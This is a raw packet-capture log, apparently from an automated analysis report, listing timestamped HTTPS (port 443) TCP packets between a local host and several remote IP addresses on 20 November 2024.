                                                                                                                                                                                              Nov 20, 2024 21:28:23.756563902 CET44349780199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.756645918 CET49780443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.757689953 CET44349781199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.757782936 CET49781443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.760942936 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.760998011 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.761008024 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.765022993 CET44349780199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.765083075 CET49780443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.768014908 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.768065929 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.768071890 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.774430037 CET44349781199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.774506092 CET49781443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.781996012 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.782052994 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.782059908 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.782107115 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.782545090 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.782577991 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.782613993 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.789827108 CET44349781199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.789906025 CET49781443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.790184021 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.790246010 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.790257931 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.790302038 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.795641899 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.795663118 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.795727015 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.795742035 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.795793056 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.805422068 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.805443048 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.805485964 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.807975054 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.807993889 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.808042049 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.809632063 CET49806443192.168.2.5104.16.124.96
                                                                                                                                                                                              Nov 20, 2024 21:28:23.809688091 CET44349806104.16.124.96192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.809772015 CET49806443192.168.2.5104.16.124.96
                                                                                                                                                                                              Nov 20, 2024 21:28:23.810036898 CET49806443192.168.2.5104.16.124.96
                                                                                                                                                                                              Nov 20, 2024 21:28:23.810066938 CET44349806104.16.124.96192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.818834066 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.818851948 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.818900108 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.820729971 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.820754051 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.820791006 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.820830107 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.824233055 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.824291945 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.826567888 CET4434978213.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.826642036 CET4434978213.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.826699972 CET49782443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.827009916 CET49782443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.827019930 CET4434978213.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.827033043 CET49782443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.827039003 CET4434978213.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.830821991 CET49807443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.830842972 CET4434980713.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.830914021 CET49807443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.831073999 CET49807443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:23.831098080 CET4434980713.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.835026979 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.835094929 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.844450951 CET44349779199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.844572067 CET49779443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.845659971 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.845711946 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.853501081 CET44349779199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.853569031 CET49779443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.865040064 CET44349780199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.865113974 CET49780443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.868449926 CET44349779199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.868522882 CET49779443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.868654013 CET44349780199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.868715048 CET49780443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.876065016 CET44349779199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.876131058 CET49779443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.878804922 CET44349780199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.878868103 CET49780443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.890320063 CET44349780199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.890383005 CET49780443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.897778988 CET44349780199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.897838116 CET49780443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.909508944 CET44349781199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.909584045 CET49781443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.918708086 CET44349780199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.918767929 CET49780443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.919939041 CET44349781199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.920016050 CET49781443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.927169085 CET44349781199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.927242994 CET49781443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.936727047 CET44349790216.239.36.181192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.936820984 CET44349790216.239.36.181192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.936872005 CET49790443192.168.2.5216.239.36.181
                                                                                                                                                                                              Nov 20, 2024 21:28:23.937124014 CET49790443192.168.2.5216.239.36.181
                                                                                                                                                                                              Nov 20, 2024 21:28:23.937149048 CET44349790216.239.36.181192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.937160969 CET49790443192.168.2.5216.239.36.181
                                                                                                                                                                                              Nov 20, 2024 21:28:23.937197924 CET49790443192.168.2.5216.239.36.181
                                                                                                                                                                                              Nov 20, 2024 21:28:23.939024925 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.939083099 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.940455914 CET44349781199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.940526009 CET49781443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.949052095 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.949111938 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.951500893 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.951566935 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.953991890 CET44349781199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.954066992 CET49781443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.956224918 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.956284046 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.959992886 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.960053921 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.960864067 CET44349781199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.960935116 CET49781443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.963949919 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.964008093 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.967142105 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.967196941 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.971273899 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.971328974 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.974040985 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.974102020 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.974200964 CET44349779199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.974267006 CET49779443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.977504969 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.977560997 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.982500076 CET44349779199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.982563019 CET49779443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.983977079 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.984046936 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.985634089 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.985697031 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.988147974 CET44349779199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.988209963 CET49779443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.990876913 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.990941048 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.996927977 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.996989012 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:23.999250889 CET44349779199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.999320030 CET49779443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:23.999356031 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:23.999416113 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.000183105 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.000242949 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:24.006622076 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.006684065 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:24.006685019 CET44349779199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.006752968 CET49779443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.009957075 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.010021925 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:24.016515970 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.016577959 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:24.022910118 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.022972107 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:24.029372931 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.029433966 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:24.032655954 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.032718897 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:24.034780979 CET44349780199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.034845114 CET49780443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.039169073 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.039235115 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:24.041318893 CET44349780199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.041740894 CET49780443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.045628071 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.045686960 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:24.050561905 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.050626040 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:24.050740957 CET44349780199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.050795078 CET49780443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.054045916 CET44349779199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.054105997 CET49779443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.059920073 CET44349780199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.059995890 CET49780443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.064594984 CET44349780199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.064665079 CET49780443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.069107056 CET44349780199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.069164991 CET49780443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.069173098 CET44349780199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.069205046 CET44349780199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.069252968 CET49780443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.069626093 CET49780443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.069634914 CET44349780199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.082873106 CET44349781199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.082962036 CET49781443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.089716911 CET44349781199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.089790106 CET49781443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.102833986 CET44349781199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.102901936 CET49781443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.105377913 CET44349791172.217.17.66192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.105598927 CET49791443192.168.2.5172.217.17.66
                                                                                                                                                                                              Nov 20, 2024 21:28:24.105629921 CET44349791172.217.17.66192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.107213974 CET44349791172.217.17.66192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.107285976 CET49791443192.168.2.5172.217.17.66
                                                                                                                                                                                              Nov 20, 2024 21:28:24.108457088 CET49791443192.168.2.5172.217.17.66
                                                                                                                                                                                              Nov 20, 2024 21:28:24.108555079 CET44349791172.217.17.66192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.108635902 CET49791443192.168.2.5172.217.17.66
                                                                                                                                                                                              Nov 20, 2024 21:28:24.108653069 CET44349791172.217.17.66192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.108807087 CET44349792172.217.17.66192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.109002113 CET49792443192.168.2.5172.217.17.66
                                                                                                                                                                                              Nov 20, 2024 21:28:24.109040022 CET44349792172.217.17.66192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.110475063 CET44349792172.217.17.66192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.110533953 CET49792443192.168.2.5172.217.17.66
                                                                                                                                                                                              Nov 20, 2024 21:28:24.110893011 CET49792443192.168.2.5172.217.17.66
                                                                                                                                                                                              Nov 20, 2024 21:28:24.110963106 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.110969067 CET44349792172.217.17.66192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.111032963 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.111090899 CET49792443192.168.2.5172.217.17.66
                                                                                                                                                                                              Nov 20, 2024 21:28:24.111099005 CET44349792172.217.17.66192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.115304947 CET44349781199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.115382910 CET49781443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.117928028 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.118021011 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.121700048 CET44349781199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.121778011 CET49781443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.131659985 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.131726980 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.134215117 CET44349781199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.134275913 CET49781443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.138755083 CET44349779199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.138829947 CET49779443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.138845921 CET44349779199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.138947964 CET44349779199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.139002085 CET49779443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.140043974 CET49779443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.140052080 CET44349779199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.144015074 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.144078970 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.145806074 CET49808443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.145818949 CET44349808199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.145889044 CET49808443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.146334887 CET49808443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.146348000 CET44349808199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.148060083 CET49791443192.168.2.5172.217.17.66
                                                                                                                                                                                              Nov 20, 2024 21:28:24.149985075 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.150051117 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.153661013 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.153734922 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:24.157263041 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.157335043 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:24.161951065 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.161967039 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.162033081 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:24.162225008 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.163542986 CET49792443192.168.2.5172.217.17.66
                                                                                                                                                                                              Nov 20, 2024 21:28:24.166665077 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.166743994 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:24.169131994 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.169317007 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:24.173744917 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.173811913 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:24.173819065 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.173861027 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:24.178141117 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.178210020 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:24.180546045 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.180614948 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:24.184771061 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.184850931 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:24.189238071 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.189385891 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:24.191555023 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.191608906 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:24.196032047 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.196089029 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:24.200341940 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.200412989 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:24.207005978 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.207081079 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:24.207103014 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.207268953 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.207297087 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:24.207304955 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.207340956 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:24.207367897 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:24.251468897 CET44349781199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.251550913 CET49781443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.257879972 CET44349781199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.257956982 CET49781443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.269939899 CET44349781199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.270018101 CET49781443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.272849083 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.272914886 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:24.275818110 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:24.275876999 CET49778443192.168.2.5199.67.80.86
